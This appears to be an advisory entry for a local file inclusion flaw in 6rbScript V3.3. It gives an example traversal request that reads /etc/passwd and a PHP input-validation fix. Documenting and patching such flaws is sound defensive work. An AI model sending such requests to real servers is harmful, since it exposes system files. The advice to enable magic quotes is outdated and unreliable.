Vendor: 6rbScript V3.3
By: Stack
CVSS: 8.8 (HIGH)
Local File Inclusion
CWE: 98
Product Name: 6rbScript V3.3
Affected Version From: V3.3
Affected Version To: V3.3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
6rbScript V3.3 Local file Vulnerability
A vulnerability in 6rbScript V3.3 allows an attacker to include local files on the server. It is possible because user input is not validated and because magic quotes and open_basedir are disabled on the server. An attacker can exploit it by sending a crafted HTTP request to the vulnerable server, such as site.il/section.php?name=../../../../etc/passwd.
Mitigation:
Input validation should be implemented to prevent attackers from including local files on the server. Additionally, magic quotes and open_basedir should be enabled on the server.
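One way to implement the input validation described above, as an added example that is not 6rbScript's own code. It assumes section.php chooses a file to include from the name request parameter; the sections directory and the resolve_section() helper are hypothetical names.

```php
<?php
// Added example: not 6rbScript's code. Assumes section.php picks a file to
// include from the "name" request parameter; SECTIONS_DIR and
// resolve_section() are hypothetical names.

const SECTIONS_DIR = __DIR__ . '/sections';

/**
 * Map a user-supplied section name to a file inside SECTIONS_DIR.
 * Returns the absolute path, or null if the name must be rejected.
 */
function resolve_section($name): ?string
{
    // Reject arrays (name[]=x) and anything that is not a short plain token.
    // No dots, slashes, backslashes or NUL bytes pass this pattern, so
    // "../../../../etc/passwd" is refused before any path is built.
    if (!is_string($name) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }

    $base = realpath(SECTIONS_DIR);
    $path = realpath(SECTIONS_DIR . '/' . $name . '.php');

    // realpath() returns false for missing files and resolves symlinks;
    // the prefix check keeps the result inside the sections directory.
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Request handling: only a validated path ever reaches include.
$file = resolve_section($_GET['name'] ?? null);
if ($file === null) {
    http_response_code(404);
    exit('Section not found');
}
include $file;
```

The check does not depend on magic quotes; setting open_basedir in php.ini to the site's directory adds a second layer if a path check is ever missed.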